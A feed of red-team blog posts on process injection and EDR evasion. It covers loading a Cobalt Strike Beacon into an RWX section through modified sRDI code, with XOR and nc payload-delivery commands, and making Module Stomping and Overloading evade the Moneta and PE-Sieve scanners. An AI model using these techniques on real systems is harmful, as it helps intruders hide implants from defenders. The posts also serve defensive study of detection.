<p>Executed sRDI shellcode will load the dll using Reflective Injection and it can provide some very useful addendums to the <a href="https://github.com/stephenfewer/ReflectiveDLLInjection">original Stephen Fewer’s technique</a>, such as access to the shellcode location and argument passing.</p>

<p>Since sRDI is using VirtualAlloc to load the dll and VirtualProtect to finalize sections, we commented out the relevant codeblocks and set the base address for the subsequent dll loading as the written shellcode location (within .themida section) plus an applied offset.
In this way the dll will be loaded onto the section itself rather than on a dynamically allocated memory space and we will be maintaining a whole RWX section because Virtualprotect won’t be called after the dll’s sections are written.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="c1">// Commented VirtualAlloc codeblock</span>
	<span class="cm">/*baseAddress = (ULONG_PTR)pVirtualAlloc(
		(LPVOID)(ntHeaders-&gt;OptionalHeader.ImageBase),
		alignedImageSize,
		MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
	);

	if (baseAddress == 0) {
		baseAddress = (ULONG_PTR)pVirtualAlloc(
			NULL,
			alignedImageSize,
			MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
		);
	}*/</span>
	<span class="k">const</span> <span class="kt">size_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">500</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">;</span>  <span class="c1">// 500 kB chosen offset from shellcode location - adapt it to your needs</span>
	<span class="n">baseAddress</span> <span class="o">=</span> <span class="p">(</span><span class="n">ULONG_PTR</span><span class="p">)</span><span class="n">pvShellcodeBase</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span>
	
	<span class="p">[...]</span>
	
	<span class="c1">// Commented VirtualProtect codeblock</span>
	<span class="cm">/*
	pVirtualProtect(
		(LPVOID)(baseAddress + sectionHeader-&gt;VirtualAddress),
		sectionHeader-&gt;SizeOfRawData,
		protect, &amp;protect
	);
	*/</span>
	
</code></pre></div></div>

<p>There’s one more thing to address, if we create a process in suspended state and then write something onto an RWX section, we’ll have PAGE_EXECUTE_WRITECOPY (WCX on ProcessHacker) permissions on the section’s areas that are not written, and this will leave a non-homogeneous RWX section.
As per microsoft documentation:</p>

<p class="notice--info"><strong>PAGE_EXECUTE_WRITECOPY enables execute, read-only, or copy-on-write access to a mapped view of a file mapping object. An attempt to write to a committed copy-on-write page results in a private copy of the page being made for the process. The private page is marked as PAGE_EXECUTE_READWRITE, and the change is written to the new page.</strong></p>

<p>This is how the .themida section looks like after the GlassWire process has been started in suspended state:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/wcx_glasswire.png" alt="image-center" title="PAGE_EXECUTE_WRITECOPY of .tehmida section" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>PAGE_EXECUTE_WRITECOPY of .themida section on process start</em></td>
    </tr>
  </tbody>
</table>

<p>If we directly write a shellcode and load a dll payload onto this section this is what we’ll get:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/wcx_shc_no_overwrite.png" alt="image-center" title="WCX and RWX cocktail" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>WCX and RWX Mojito cocktail</em></td>
    </tr>
  </tbody>
</table>

<p>So to avoid leaving WCX permissions around <strong>we can overwrite the whole section once with dummy data in order to get a clean and contiguous RWX section even after the shellcode gets written and the payload is loaded.</strong></p>

<p>For this very same reason of not leaving unnecessary artifacts, we’ll also overwrite the sRDI shellcode blob with dummy data but only after it has been executed and loaded our Beacon in the right RWX section.</p>

<p>The visual representation of what we would like to achieve is depicted in the following figure.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/procstomping.png" alt="image-center" title="Process Stomping using sRDI to load a payload on an executable's section" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Process Stomping using sRDI to load a payload on an executable’s section</em></td>
    </tr>
  </tbody>
</table>

<h3 id="putting-it-all-together-srdi--reflective-loaderless-beacon--process-stomping">Putting it all together: sRDI — Reflective-Loaderless Beacon — Process Stomping</h3>

<p>After compiling the sRDI project with our modifications, some post build actions are performed and their aim is to extract the .text section of the built executable placing it under the bin folder. This is because sRDI code is written as PIC (Position Independent Code) so that it can be executed like shellcode.
The next step is to update the newly generated PIC into the sRDI tools used for loading or generating the final shellcode blob:</p>

<p><code class="language-plaintext highlighter-rouge">cd C:\Users\naksyn\sRDI\sRDI-master</code></p>

<p><code class="language-plaintext highlighter-rouge">python .\lib\Python\EncodeBlobs.py .\</code></p>

<p>We can now generate a Cobalt Strike Beacon dll without a reflective loader but be sure to generate an x86 payload and you can double check the output on the Script Console to make sure the Beacon dll has been generated correctly.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/script_console_output.png" alt="image-center" title="Beacon dll generated without Reflective Loader" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Cobalt Strike Script Console output during the generation of a Beacon dll without Reflective Loader</em></td>
    </tr>
  </tbody>
</table>

<p>The payload dll can now be converted into shellcode. sRDI will prepend its bootstrap in the following <a href="https://www.netspi.com/blog/technical/adversary-simulation/srdi-shellcode-reflective-dll-injection/">way</a>:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/srdi.png" alt="image-center" title="sRDI shellcode blob" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>sRDI shellcode blob structure - image taken from: https://www.netspi.com/blog/technical/adversary-simulation/srdi-shellcode-reflective-dll-injection/</em></td>
    </tr>
  </tbody>
</table>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python ..\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

</code></pre></div></div>

<p>The shellcode blob can then be xored with a key-word and downloaded using a simple socket as implemented in the <a href="https://github.com/naksyn/ProcessStomping/">Process Stomping repo</a></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

nc -vv -l -k -p 8000 -w 30 &lt; noRLx86_enc.bin
</code></pre></div></div>

<p>Here’s a video demonstration:</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/procstomping.mp4" type="video/mp4" />
</video>

<p>After running Moneta against the injected process we get these results:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/glasswire_moneta_bangarang.png" alt="image-center" title="Moneta output against the injected process" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Moneta output against the injected process</em></td>
    </tr>
  </tbody>
</table>

<p>We can see that the .themida section has RWX permissions for the whole size of it and that there’s a thread started from an offset because we resumed the main thread starting at the shellcode address.</p>

<h3 id="outro">Outro</h3>

<p>Executables with RWX sections can be abused similarly to dlls, but there are differences that may offer better detection opportunities.</p>

<p>In fact, Process Stomping technique requires starting the target process in a suspended state, changing the thread’s entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.</p>

<p>However, as of November 2023, exploiting RWX sections in executables is not a widely abused technique and may allow an attacker to blend in, potentially being dismissed as a false positive, without resorting to the well-known Mockingjay technique applied to DLLs.</p>

<p>By leveraging sRDI or other purposely built custom Reflective Loaders, malicious payloads can be written, loaded, and executed within the available RWX sections. This avoids the need for dynamic memory allocation during both the stages of shellcode and payload execution.</p>]]></content><author><name>Naksyn</name></author><category term="EDR evasion" /><category term="evasion" /><category term="redteam" /><category term="injection" /><category term="cobalt strike" /><category term="process stomping" /><category term="sRDI" /><summary type="html"><![CDATA[Executables with RWX sections can be abused using a variation of a Process Overwriting technique dubbed Process Stomping. Using (a modified) sRDI and leveraging the new features of Cobalt Strike 4.9 has been possible to load beacon in the RWX section itself without the need for a custom UDRL.]]></summary></entry><entry><title type="html">Improving the stealthiness of memory injections techniques</title><link href="https://www.naksyn.com/edr%20evasion/2023/06/01/improving-the-stealthiness-of-memory-injections.html" rel="alternate" type="text/html" title="Improving the stealthiness of memory injections techniques" /><published>2023-06-01T00:00:00-04:00</published><updated>2023-06-03T17:10:20-04:00</updated><id>https://www.naksyn.com/edr%20evasion/2023/06/01/improving-the-stealthiness-of-memory-injections</id><content type="html" xml:base="https://www.naksyn.com/edr%20evasion/2023/06/01/improving-the-stealthiness-of-memory-injections.html"><![CDATA[<p><img src="/images/injection-meme.png" alt="image-center" title="I can haz injection" class="align-center" /></p>

<div id="entry-table-of-contents" class="toc-wrapper">
  <h2 id="toc-toggle" class="no_toc">
  Table of Contents <i class="toc-toggle-icon fas fa-chevron-down"></i>
</h2>
<ol id="markdown-toc">
  <li><a href="#tldr" id="markdown-toc-tldr">TL;DR</a></li>
  <li><a href="#credits" id="markdown-toc-credits">Credits</a></li>
  <li><a href="#intro" id="markdown-toc-intro">Intro</a>    <ol>
      <li><a href="#injection-categories" id="markdown-toc-injection-categories">Injection Categories</a>        <ol>
          <li><a href="#code-injection" id="markdown-toc-code-injection">Code Injection</a></li>
          <li><a href="#pe-injection" id="markdown-toc-pe-injection">PE Injection</a></li>
          <li><a href="#process-manipulation" id="markdown-toc-process-manipulation">Process Manipulation</a></li>
        </ol>
      </li>
    </ol>
  </li>
  <li><a href="#improvement-strategy" id="markdown-toc-improvement-strategy">Improvement Strategy</a>    <ol>
      <li><a href="#moving-parts---injection-technique" id="markdown-toc-moving-parts---injection-technique">Moving Parts - Injection technique</a></li>
      <li><a href="#moving-parts---loader" id="markdown-toc-moving-parts---loader">Moving Parts - Loader</a></li>
      <li><a href="#moving-parts---payload" id="markdown-toc-moving-parts---payload">Moving Parts - Payload</a></li>
      <li><a href="#testing-with-memory-scanners" id="markdown-toc-testing-with-memory-scanners">Testing with memory scanners</a></li>
      <li><a href="#starting-point---pythonmemorymodule" id="markdown-toc-starting-point---pythonmemorymodule">Starting Point - PythonMemoryModule</a></li>
      <li><a href="#module-overloading" id="markdown-toc-module-overloading">Module Overloading</a></li>
      <li><a href="#module-stomping" id="markdown-toc-module-stomping">Module Stomping</a></li>
    </ol>
  </li>
  <li><a href="#module-shifting" id="markdown-toc-module-shifting">Module Shifting</a></li>
  <li><a href="#outro" id="markdown-toc-outro">Outro</a></li>
</ol>

</div>

<p>The topic has been presented at <a href="https://www.x33fcon.com/#!s/DiegoCapriotti.md">x33fcon 2023 Talk - Improving the Stealthiness of Memory Injection Techniques</a> (slide deck is available <a href="https://github.com/naksyn/talks/">here</a>)</p>

<h3 id="tldr">TL;DR</h3>

<p>Injection techniques can be grouped in three main categories:</p>

<ol>
  <li>Code Injection</li>
  <li>PE Injection</li>
  <li>Process Manipulation</li>
</ol>

<p>This post focuses on improving Module Stomping and Module Overloading, part of the PE injection techinques, that have been chosen as candidates because they avoid the creation of dynamic memory allocation and perform a common operation (LoadLibrary) that is the cornerstone of the technique.</p>

<p>The public implementation of Module stomping till date are getting “Modified Code” IoC by <a href="https://github.com/forrest-orr/moneta">Moneta</a> because of the stomped code living on the hosting dll.</p>

<p>Moneta will compare the dll bytes on disk with in-memory bytes and the output will be the “Modified Code” IoC.
This outcome can be avoided by looking at injection techniques from a higher level and thinking about a proper improvement strategy. In fact, there are several moving parts in an injeciton techniques:</p>

<ol>
  <li>the loader</li>
  <li>the injection technique</li>
  <li>the payload</li>
</ol>

<p class="notice--info"><strong>If we can keep the payload functionally independent from the stomped bytes, we can restore the stomped bytes and get rid of the “Modified Code” IoC that some module stomping public implementations bring.</strong></p>

<p>Module Overloading, on the other hand, requires having a PE payload living on a “hosting dll” and we cannot revert the copied bytes back to their original value, otherwise this will impair the payload execution.</p>

<p>However, Module Overloading can be improved by choosing the right hosting dll section where to write the payload, and by mimicking some seemingly “strange” behaviour held by windows and third party libraries that overwrite some of their very same PE section, leading to the “Modified Code IoC” with Moneta.</p>

<p>All these improvements led to a modified Module Stomping and Module Overloading technique that has been dubbed <a href="https://github.com/naksyn/ModuleShifting">Module Shifting</a>.
 To connect these concepts to my previous <a href="https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html">Python research</a> I developed the PoC in Python ctypes such that it can be used dynamically with <a href="https://github.com/naksyn/Pyramid">Pyramid</a>.</p>

<h3 id="credits">Credits</h3>

<p>A huge thank you to the amazing people that published knowledge and tools instrumental to this work:</p>

<ul>
  <li>Aleksandra Doniec (hasherezade) for <a href="https://github.com/hasherezade/module_overloading">Module Overloading</a>, <a href="https://github.com/hasherezade/pe-sieve">PE-Sieve</a>, <a href="https://github.com/hasherezade/pe-bear">PE-Bear</a> and for technical discussions</li>
  <li>Forrest Orr for <a href="https://github.com/forrest-orr/moneta">Moneta</a> and his <a href="https://www.forrest-orr.net/blog">Memory Evasion blog series</a>.</li>
  <li>Kyle Avery for <a href="https://github.com/kyleavery/AceLdr">AceLdr</a></li>
  <li>Fsecure and Bobby Cooke for their public Module Stomping implementation <a href="https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/">(1)</a><a href="https://github.com/boku7/Ninja_UUID_Runner">(2)</a></li>
</ul>

<h3 id="intro">Intro</h3>

<p>The purpose of the post is to improve some injection techniques, so to better understand the process involved we’ll try to answer the following questions:</p>

<ol>
  <li>What’s important to know about an injection and how can we choose between the myriad of available techniques</li>
  <li>How can we test the stealthiness and define a benchmark</li>
  <li>How can we improve an injection technique.</li>
</ol>

<p>In the realm of Offensive Cybersecurity, injection techniques play a pivotal role in various malicious activities.</p>

<p>These techniques involve the insertion of code or payloads into the memory space of legitimate processes, often enabling attackers to execute arbitrary actions covertly.</p>

<p>Among the various techniques, three main categories stand out: Code Injection, PE Injection, and Process Manipulation.</p>

<p>In this post, we will delve into the domain of PE Injection, focusing specifically on two advanced techniques: Module Stomping and Module Overloading.
Module Stomping and Module Overloading are intriguing techniques within the realm of PE Injection due to their ability to sidestep dynamic memory allocation and rely on a fundamental operation known as LoadLibrary.</p>

<p>These techniques, while effective, have been scrutinized for leaving traces that can be detected by advanced security tools like Moneta. Moneta’s detection mechanism involves comparing on-disk DLL bytes with in-memory bytes, effectively flagging modified code as an Indicator of Compromise (IoC). 
This post addresses the challenges posed by these techniques and presents an innovative approach to enhance their stealth and effectiveness.</p>

<h4 id="injection-categories">Injection Categories</h4>

<p>Since our aim is to improve the stealthiness of injection techniques, we’ll try to group the injection technique in categories and having a focus on the IoCs that are most commonly left by techniques in a same group.
This is by far not a comprehensive description of every injection techniques but the purpose is to provide some high-level overview so that we can better identify promising injection techniques to improve. 
If you need a more detailed overview, the <a href="https://www.youtube.com/watch?v=xewv122qxnk">Blackhat 2019 presentation - Process Injection Techniques: Gotta Catch Them All</a> can be beneficial.</p>

<h5 id="code-injection">Code Injection</h5>

<p>techniques included in this group insert and execute malicious code within a target process’s memory, typically involving dynamic memory allocation.
Some of the most common techniques in this group are:</p>
<ol>
  <li>Classic shellcode injection:
    <ul>
      <li>Allocate memory in the target process</li>
      <li>Write malicious code into the allocated memory</li>
      <li>Create a remote thread or execute via callback functions</li>
    </ul>
  </li>
  <li>APC injection:
    <ul>
      <li>Allocate memory in the target process</li>
      <li>Write malicious code into it</li>
      <li>queue APC</li>
      <li>Resume thread execution</li>
    </ul>
  </li>
  <li>Hook Injection
    <ul>
      <li>Intercept API calls made by the target process</li>
      <li>Redirect the intercepted API calls to the malicious code</li>
    </ul>
  </li>
  <li>Thread Local Storage injection
    <ul>
      <li>modify the target process’ PE header (TLS callback function)</li>
      <li>Execute the injected code as a TLS callback</li>
    </ul>
  </li>
  <li>Exception-Dispatching Injection
    <ul>
      <li>Allocate memory in the target process</li>
      <li>write malicious code into it</li>
      <li>modify the target process’ exception handler</li>
      <li>Trigger an exception in the target process</li>
    </ul>
  </li>
</ol>

<p>The most prevalent IoC for the techniques listed in this group is the <strong>Dynamic memory Allocation, usually made by VirtualAlloc and HeapAlloc API calls, and subsequent changes in memory permissions</strong> (RWX, RW then RX, etc.)
There are also technique-specific IoCs that are generated by some techniques, but they are very peculiar and can generally be fingerprinted by security vendors once a technique becomes public, so for that matter we are mostly interested in the common IoCs shared by most of the techniques in a group, so that we have a simpler map of an injection category and traces left by most of the techniques.</p>

<h5 id="pe-injection">PE Injection</h5>

<p>Techniques included in this group inject a Portable Executable (PE) file such as dlls or exes into the address space of a running process.
Some of the most common techniques in this group are:</p>
<ol>
  <li>Classic dll injection:
    <ul>
      <li>Drop dll on disk</li>
      <li>allocate memory to target process and write malicious dll</li>
      <li>Load dll using LoadLibrary or similar method</li>
    </ul>
  </li>
  <li>Reflective dll injection
    <ul>
      <li>Reflective loader is part of the malicious dll</li>
      <li>the loader loads and map the malicious dll into target process without actually calling LoadLibrary or other Windows API.</li>
      <li>Resolve dependencies and perform relocations</li>
    </ul>
  </li>
  <li>MemoryModule
    <ul>
      <li>similar to reflective dll injection but the loader code is external and not embedded in the dll itself.</li>
      <li>this technique is more flexible since it allows the loading of unmodified dlls.</li>
    </ul>
  </li>
  <li>Module Stomping
    <ul>
      <li>Load a dll into the target process</li>
      <li>Overwrite dll’s section/s with shellcode and execute it</li>
    </ul>
  </li>
  <li>Module Overloading
    <ul>
      <li>Load a dll into the target process</li>
      <li>Overwrite loaded dll memory space with malicious PE</li>
    </ul>
  </li>
</ol>

<p>By injecting a PE, we are requiring that PE to run on the overwritten dlls’ bytes and this would typically mean that the PE is a “final” payload that does not load or execute further stages. On the other hand, by using shellcode (i.e. Module Stomping) an attacker can craft a more stealthier approach by using a shellcode that is loading a final payload in another area of memory.
As we’ll see later in the post, this is a key property that enables some improvements in the injection technique.</p>

<p>Injection techniques in this group mostly leverage, or mimic, a normal dll loading operation such as LoadLibrary. This is a key element that can provide an avenue for attackers to better blend into environments while injecting.</p>

<h5 id="process-manipulation">Process Manipulation</h5>

<p>Techniques included in this group are used to manipulate or modify the memory and execution context of running processes, libraries, or creating new processes with malicious payloads.
Some of the most common techniques in this group are:</p>
<ol>
  <li>Process Hollowing:
    <ul>
      <li>Create process in suspended state</li>
      <li>Replace memory contents with malicious executable</li>
      <li>Resume execution</li>
    </ul>
  </li>
  <li>Process doppelgänging
    <ul>
      <li>Abuse NTFS transactions to load a malicious executable within the context of a legitimate process</li>
    </ul>
  </li>
  <li>Sideloading
    <ul>
      <li>Drop dll on disk</li>
      <li>Abuse windows dll search order or missing dlls to load a malicious dll into a legitimate process</li>
    </ul>
  </li>
  <li>Thread Execution Hijacking
    <ul>
      <li>Suspend a thread in the target process</li>
      <li>Modify instruction pointer to execute malicious code</li>
    </ul>
  </li>
</ol>

<p>The most prevalent IoCs generated by these techniques are <strong>alterating the context or normal execution flow of a PE</strong> (suspend execution state, abuse dll search order).<br />
While this category contain some very powerful techniques, such as sideloading, we might want to first look for techniques that leverages mostly legitimate process’ operations and do not alter execution flow, in order to get more chances of blending into an environment without standing out as odd behaviour.</p>

<h3 id="improvement-strategy">Improvement Strategy</h3>

<p>Before diving into the improvement phase, we should have a proper strategy under our sleeves since the injection technique is not a single element but it is part of a <strong>chain composed by the injection technique, loader and the payload as their main moving parts</strong>.</p>

<p>The most prevalent IoC for these techniques is that <strong>the PE (dll or exe) or shellcode, is residing in memory of a (legitimate) loaded dll</strong>. This will lead to a mismatch between in-memory bytes and on-disk dll’s bytes caused by the overwriting of the loaded dll memory space with malicious code.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/movingparts.png" alt="image-center" title="Moving parts of an injection Technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Moving parts of an injection Technique</em></td>
    </tr>
  </tbody>
</table>

<h4 id="moving-parts---injection-technique">Moving Parts - Injection technique</h4>

<p>The injection technique should not be seen as an isolated element, because its choice can be influenced by the payload or the loader. 
For example, if your payload to be injected is a PE, you’ll basically limit your injection options to the PE injection category.
Similarly, if you choose to use an embedded loader to load a dll, you’re narrowing down to reflective dll injection.</p>

<p>An attacker should choose an injection technique primarily based on operational considerations, some common drivers might be:</p>
<ul>
  <li>use an injection to emulate a predefined Threat Actor.</li>
  <li>choose an injection that is more likely to blend into an environment</li>
  <li>use an injection that can bypass a the security solution the attacker is up against (not necessarily blending into the environment).</li>
</ul>

<p>We are mostly interested in <strong>blending into an environment</strong>, because this can bring the broadest operational depth. For this reason, two key features that the Injection technique should have are:</p>
<ol>
  <li>Avoidance of dynamic memory allocation (via VirtualAlloc or HeapAlloc).</li>
  <li>Usage of a legitimate process operation</li>
</ol>

<p>Looking for injection techniques techniques with these characteristics we can recall from the Introductory overview that Module Stomping and Module Overloading are two injection techniques that leverage the legitimate LoadLibrary operation to avoid dynamic memory allocation such that malicious shellcode or PE can be written over the loaded dll memory space.</p>

<p>For this reason we chose to <strong>target Module Stomping and Module Overloading</strong> and look for ways to improve them.</p>

<h4 id="moving-parts---loader">Moving Parts - Loader</h4>

<p>The purpose of the loader is to execute the injection technique itself, eventually loading and executing a payload. There are mainly three types of loaders:</p>

<ol>
  <li><strong>embedded</strong> - the loader is part of the payload (usually a PE). 
 For example, reflective dll injection uses an embedded loader that is coded in the dll and bootstraps the loading process of the dll itself.</li>
  <li><strong>external</strong> - the loader is not part of the payload, it’s typically a standalone PE that gets a shellcode, BOF or PE as input payload and kicks off the injection technique. The payload can be written within a section of the loader itself or can be downloaded/read from disk/pipe.</li>
  <li><strong>interpreted</strong> - this loader is coded in an interpreted language and executed by the code interpreter. This kind of loaders do not need a purposely compiled PE to run and can be executed in memory by the interpreter that need to be present or dropped on the target.</li>
</ol>

<p>Building upon my previous Python research, our strategy is adopting an interpreted loader because we’ll want to avoid the generation of suspicious PE loaders that generally have a very short life-span can be easily fingerprinted and leverage the powerful evasion properties that Python brings to the game:</p>
<ol>
  <li>Python embeddable package comes with a signed interpreter that can be dropped on the target</li>
  <li>Coding the loader using Python ctypes allows to <strong>dynamically execute wrapped C language</strong> code via Python. We can essentially execute any Windows API using Python via the signed interpreter.</li>
  <li>Combining Python with Pyramid allows to in-memory import Python modules and execute complex operations entirely in memory.</li>
  <li>We can avoid the usage of compiled PE for injection.</li>
  <li>We can avoid AMSI inspection (there’s no AMSI for Python) and AV/EDR inspection of dynamic Python code (there’s no introspection for dynamic Python code).</li>
</ol>

<h4 id="moving-parts---payload">Moving Parts - Payload</h4>

<p>The final stage of an injection technique is to achieve payload execution, that’s essentially code to be run on a target machine.
In the context of Memory Injection, payloads can come in the form of:</p>
<ol>
  <li>PE (executables or dlls)</li>
  <li>Position Independent Code (Shellcode, BOFs, etc.)</li>
</ol>

<p>PE payloads are usually less flexible than shellcode because of their size (PE Header and sections’ overhead) and they’re also rarely used to stage further malware, instead they’re often intended as “final” payloads containing the core of the malware.
Furthermore, the size constrait make PE an unviable candidate for injection techniques where little space is available.</p>

<p>On the other hand, shellcode has more flexibility and evasion properties:</p>
<ul>
  <li>Shellcode can be used to load further stages payloads (even a PE) and can be made independent from final payloads, meaning that once the shellcode loaded and started the final payload, it can be erased without impairing the functionality of the final payload itself.</li>
  <li>Shellcode can be shrank (using stagers for example) to fit small space constraints.</li>
  <li>Position Independent Code payloads can be obfuscated <a href="https://github.com/codewhitesec/Lastenzug">at the assembly level</a></li>
</ul>

<p>For this reasons we’ll choose shellcode as payload and to make it independent from further stages we’ll use a stageless Cobalt Strike generated with AceLdr shellcode.</p>

<p>AceLdr shellcode will load a copy of Beacon on the Heap and it’ll apply advanced in-memory evasion techniques. 
The scope of this blogpost is improving the injection technique rather than the payloads, so we’ll be focusing on the artifacts that the injection technique is leaving behind.</p>

<h4 id="testing-with-memory-scanners">Testing with memory scanners</h4>

<p>In the realm of cybersecurity, understanding and mitigating novel threats is paramount. For this purpose, great professionals like Aleksandra Doniec and Forrest Orr published 
<a href="https://github.com/forrest-orr/moneta">Moneta</a> and <a href="https://github.com/hasherezade/pe-sieve">Pe-Sieve</a>, that are state-of-the-art publicly available memory scanners designed to detect sophisticated memory-based attacks.</p>

<p>Moneta excels in identifying the presence of dynamic/unknown code and suspicious characteristics of the mapped PE image regions, which are often telltale signs of an attack.
On the other hand, Pe-Sieve is designed to identify suspicious memory regions based on malware IOCs and uses a variety of data analysis tricks to refine its detection criteria. 
These tools were originally designed for defenders, but could be also used by attackers to improve their craft.</p>

<p>When we delve into the intricacies of memory injection techniques like Module stomping and Module overloading, both these tools become instrumental. 
By utilizing these scanners, we can identify the improvement opportunities in these injection techniques, making it possible to enhance their efficiency when deploying shellcode and ensuring they remain undetected by modern defense mechanisms.</p>

<p>Having these tools at hand is also beneficial infinding some weird common behaviours that we can use to our advantage to better blend in. 
For example, running Moneta on all processes on a Windows 10 Operating system and inspecting its results, can lead to interesting findings.</p>

<p>In fact, some .NET dlls are known to do self-modifications on their .text section, leading to the Moneta’s “Modified Code” IoC. 
Third-party apps like Discord and Signal also have the same behaviour, it’s interesting to note that the size of the bytes that they’re overwriting is bigger in the latter cases.</p>

<p>Generally, the bigger the size the dll is self-modifying, the better, since an attacker can smuggle a bigger payload and mimick the exact same behaviour of the legitimate applications.
In particular, security solutions would probably whitelist this behaviour otherwise they’ll be overwhelmed by false positives and customers will be unhappy.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/FP1.png" alt="image-center" title="False Positives - self-modifying behaviours done by legitimate applications" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>False Positives - self-modifying behaviours done by legitimate applications</em></td>
    </tr>
  </tbody>
</table>

<h4 id="starting-point---pythonmemorymodule">Starting Point - PythonMemoryModule</h4>

<p>After defining the strategy, we should start somewhere and iterate to improve. Our starting point is the MemoryModule technique, that is instrumental to the Module Overloading injection that we’ll target later on.</p>

<p>MemoryModule is a technique <a href="https://www.joachim-bauch.de/tutorials/loading-a-dll-from-memory/">firstly published</a> by Joachim Bauch and is used to map and load a dll in memory without calling the LoadLibrary Windows API.
This is achieved by executing the same operations done by the Windows Loader when issuing the LoadLibrary API call
The following image depicts its basic steps:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/PythonMM.png" alt="image-center" title="MemoryModule technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>MemoryModule technique</em></td>
    </tr>
  </tbody>
</table>

<p>In order to use the MemoryModule technique with a Python interpreted loader, the technique has been ported to Python ctypes and is available <a href="https://github.com/naksyn/PythonMemoryModule">on my PythonMemoryModule github project</a>.</p>

<p>Combining the PythonMemoryModule project with <a href="https://github.com/naksyn/Pyramid">Pyramid</a> we can achieve the injection of a Cobalt Strike dll with MemoryModule technique using a full in-memory Python loader.
In the following video we’ll demostrate the injection and the scanning results of Moneta and PE-Sieve on the injected process.</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/PythonMM.mp4" type="video/mp4" />
</video>

<p>In summary, PythonMemoryModule used with a Cobalt Strike dll is producing the following IoCs:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/IoCMM.png" alt="image-center" title="IoCs generated by MemoryModule and Cobalt Strike dll Artifact" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>IoCs generated by MemoryModule and Cobalt Strike dll Artifact</em></td>
    </tr>
  </tbody>
</table>

<p>The Abnormal Private executable Memory IoC detected at 0x6bac1000 is due to the MemoryModule injection technique that copied the .text section at that address and changed its permissions to RX subsequently.</p>

<p>The other abnormal private executable memory IoC is generated because Cobalt Strike dll is self-bootstrapping Beacon in another area of memory (0x1c575a90000) so we basically here have two PEs in memory that are generating IoCs but only one is running Beacon.
Dynamic memory allocation would necessarily nead to “Abnormal Private Executable Memory” IoC at some point, se we would want to get rid of this IoC in the first place.</p>

<p>Module Overloading and Module Stomping techniques can provide us a way to avoid dynamic memory allocation.</p>

<h4 id="module-overloading">Module Overloading</h4>

<p>Module Overloading technique, firstly <a href="https://github.com/hasherezade/module_overloading">published by Aleksandra Doniec</a>, aims at avoiding the creation of dynamic memory allocation by firstly loading a hosting dll using LoadLibrary API, overwriting malicious content (PE) onto it, and loading it using the same Memory Module steps we saw earlier.</p>

<p>In this way the legitimate hosting dll is loaded via LoadLibrary API, but malicious content is loaded using the Memory Module technique over the memory space of the hosting dll that is legitimately loaded. This clever mix makes the Module Overloading Technique.</p>

<p>At a high level, Module Overloading steps (as implemented by Aleksandra Doniec) look like this:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/moduleoverloading.png" alt="image-center" title="Module Overloading injection technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Overloading injection technique</em></td>
    </tr>
  </tbody>
</table>

<p>Even though this technique is stealthier than Memory Module, we still have some IoCs to work on. Specifically, Moneta will identify “Modified Code” and “Modified Header” as IoCs after executing the injection.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/moduleoverloadingIoCs.png" alt="image-center" title="Module Overloading IoCs" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Overloading IoCs</em></td>
    </tr>
  </tbody>
</table>

<p>This result stems from the fact that we overwrote the hosting dll memory space with malicious content, so when Moneta and PE-Sieve are doing a comparison between on-disk bytes of the hosting dll with its memory counterpart this will mismatch and fire the “Modified Code” and “Replaced” IoC if the overwriting happen to come across the hosting dll’s mapped .text section.</p>

<p>The “Modified Header” IoC is generated because this technique implementation starts overwriting from the very top of the hosting dll memory space, thus overwriting the PE header that commonly happens to reside in the first 0x1000 bytes.</p>

<p>All things considered, we got rid of the MemoryModule’s “Abnormal Private Executable memory” IoC but we introduced other IoCs related to the hosting dll byte-by-byte comparison between on-disk and memory space.</p>

